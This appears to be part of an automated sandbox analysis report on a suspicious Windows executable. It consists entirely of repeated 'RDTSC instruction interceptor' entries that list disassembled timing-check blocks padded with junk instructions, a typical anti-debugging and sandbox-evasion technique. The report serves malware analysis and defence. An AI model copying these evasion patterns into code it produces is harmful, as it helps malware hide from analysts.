Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 438FE9 second address: 438FEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 438FEF second address: 438FF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 438FF5 second address: 439021 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F8EA52B3CA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8EA52B3CB8h 0x00000013 jbe 00007F8EA52B3CA6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B00030 second address: 4B00048 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8EA4E2EA54h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B00048 second address: 4B0005B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c movsx edx, cx 0x0000000f movzx esi, dx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B0005B second address: 4B0006D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F8EA4E2EA4Ch 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B0006D second address: 4B0007B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B0007B second address: 4B0007F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B0007F second address: 4B00097 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA52B3CB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B00097 second address: 4B000AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, dx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov eax, 3DC2D907h 0x00000013 movzx esi, bx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B000AE second address: 4B00121 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8EA52B3CB4h 0x00000009 or ax, 2FE8h 0x0000000e jmp 00007F8EA52B3CABh 0x00000013 popfd 0x00000014 jmp 00007F8EA52B3CB8h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F8EA52B3CB8h 0x00000026 xor cx, 04A8h 0x0000002b jmp 00007F8EA52B3CABh 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B00121 second address: 4B00127 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B20F10 second address: 4B20F45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA52B3CB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F8EA52B3CAEh 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 mov dx, 9442h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B20F45 second address: 4B20F75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov ah, bh 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov bl, al 0x0000000c jmp 00007F8EA4E2EA53h 0x00000011 popad 0x00000012 mov ebp, esp 0x00000014 pushad 0x00000015 movzx eax, dx 0x00000018 mov esi, edx 0x0000001a popad 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B20F75 second address: 4B20F79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B20F79 second address: 4B20F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AC013D second address: 4AC0141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AC0141 second address: 4AC015B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4E2EA56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AC015B second address: 4AC0186 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 mov eax, 36DF36C9h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F8EA52B3CB4h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AC0186 second address: 4AC018A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AC018A second address: 4AC0190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AC023E second address: 4AC024D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4E2EA4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AC024D second address: 4AC0265 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8EA52B3CB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AE0CFD second address: 4AE0D13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4E2EA4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AE0D13 second address: 4AE0D17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AE0D17 second address: 4AE0D1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AE0789 second address: 4AE078D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AE078D second address: 4AE0793 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AE0793 second address: 4AE07B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA52B3CB2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AE07B0 second address: 4AE07B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AE07B4 second address: 4AE07BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AE07BA second address: 4AE083A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4E2EA54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov dh, BAh 0x0000000d mov ebx, ecx 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 jmp 00007F8EA4E2EA54h 0x00000016 mov ebp, esp 0x00000018 jmp 00007F8EA4E2EA50h 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov si, bx 0x00000024 pushfd 0x00000025 jmp 00007F8EA4E2EA59h 0x0000002a sub esi, 0EA26DE6h 0x00000030 jmp 00007F8EA4E2EA51h 0x00000035 popfd 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AE06C7 second address: 4AE06CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AE06CB second address: 4AE06E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4E2EA59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AE06E8 second address: 4AE0742 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA52B3CB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F8EA52B3CB1h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F8EA52B3CACh 0x00000017 adc cx, 99B8h 0x0000001c jmp 00007F8EA52B3CABh 0x00000021 popfd 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F8EA52B3CACh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AE0742 second address: 4AE0748 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AE0748 second address: 4AE0759 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8EA52B3CADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AE03DE second address: 4AE03E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AE03E2 second address: 4AE03E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AE03E8 second address: 4AE0402 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 8F31h 0x00000007 mov dh, ah 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d pushad 0x0000000e push esi 0x0000000f mov si, dx 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 mov ecx, 10CE88D9h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AF02CE second address: 4AF02D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AF02D4 second address: 4AF02D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AF02D8 second address: 4AF02DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AF02DC second address: 4AF02F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8EA4E2EA4Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AF02F2 second address: 4AF02F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AF02F8 second address: 4AF0308 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c mov bx, 4898h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B20E3D second address: 4B20E43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B20E43 second address: 4B20E94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4E2EA4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F8EA4E2EA4Bh 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F8EA4E2EA4Bh 0x00000019 adc ax, 0AFEh 0x0000001e jmp 00007F8EA4E2EA59h 0x00000023 popfd 0x00000024 movzx eax, dx 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B20E94 second address: 4B20EBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA52B3CAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov cx, F70Dh 0x00000010 jmp 00007F8EA52B3CAAh 0x00000015 popad 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B20EBB second address: 4B20EC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B003EE second address: 4B003F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B003F2 second address: 4B0040F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4E2EA59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B0040F second address: 4B00415 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B00415 second address: 4B00419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B00419 second address: 4B0047A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA52B3CB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F8EA52B3CB9h 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 movzx eax, di 0x00000016 call 00007F8EA52B3CB9h 0x0000001b pushad 0x0000001c popad 0x0000001d pop esi 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 pushad 0x00000022 mov ebx, 4261261Eh 0x00000027 push eax 0x00000028 push edx 0x00000029 mov dl, 61h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B0047A second address: 4B00496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [ebp+08h] 0x00000008 pushad 0x00000009 mov bx, F8FCh 0x0000000d mov ebx, 40C4A8E8h 0x00000012 popad 0x00000013 and dword ptr [eax], 00000000h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B00496 second address: 4B0049C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B0049C second address: 4B004B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4E2EA4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax+04h], 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov eax, edi 0x00000012 mov ecx, edi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B004B7 second address: 4B004DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, dx 0x00000006 mov ax, di 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8EA52B3CB8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B004DE second address: 4B004E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AE05AD second address: 4AE0631 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA52B3CB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007F8EA52B3CACh 0x00000010 pushfd 0x00000011 jmp 00007F8EA52B3CB2h 0x00000016 sub cx, 0DE8h 0x0000001b jmp 00007F8EA52B3CABh 0x00000020 popfd 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F8EA52B3CABh 0x0000002d and cx, 9D2Eh 0x00000032 jmp 00007F8EA52B3CB9h 0x00000037 popfd 0x00000038 mov di, ax 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AF0F0B second address: 4AF0F31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4E2EA51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F8EA4E2EA4Ah 0x00000012 mov ebx, esi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AF0F31 second address: 4AF0F64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA52B3CB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8EA52B3CB5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AF0F64 second address: 4AF0F85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4E2EA51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov bx, 5F7Eh 0x00000012 mov dl, F5h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AF0F85 second address: 4AF0FB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA52B3CB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8EA52B3CB8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AF0FB7 second address: 4AF0FBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AF0FBB second address: 4AF0FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B00274 second address: 4B0028C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4E2EA4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B0028C second address: 4B00290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B00290 second address: 4B00294 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B00294 second address: 4B0029A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B0029A second address: 4B002DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, ch 0x00000005 mov ah, dh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F8EA4E2EA55h 0x00000011 mov di, ax 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F8EA4E2EA59h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B002DB second address: 4B002E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B20660 second address: 4B20666 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B20666 second address: 4B2066A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B2066A second address: 4B2066E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B2066E second address: 4B206DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F8EA52B3CAEh 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 push eax 0x00000011 mov ebx, 3B663B10h 0x00000016 pop edx 0x00000017 movzx esi, di 0x0000001a popad 0x0000001b mov ebp, esp 0x0000001d jmp 00007F8EA52B3CB1h 0x00000022 xchg eax, ecx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F8EA52B3CB3h 0x0000002c or cx, 2E1Eh 0x00000031 jmp 00007F8EA52B3CB9h 0x00000036 popfd 0x00000037 push ecx 0x00000038 pop edi 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B206DF second address: 4B206E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B206E5 second address: 4B206E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B206E9 second address: 4B2070B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F8EA4E2EA52h 0x0000000e xchg eax, ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B2070B second address: 4B2070F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B2070F second address: 4B20715 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
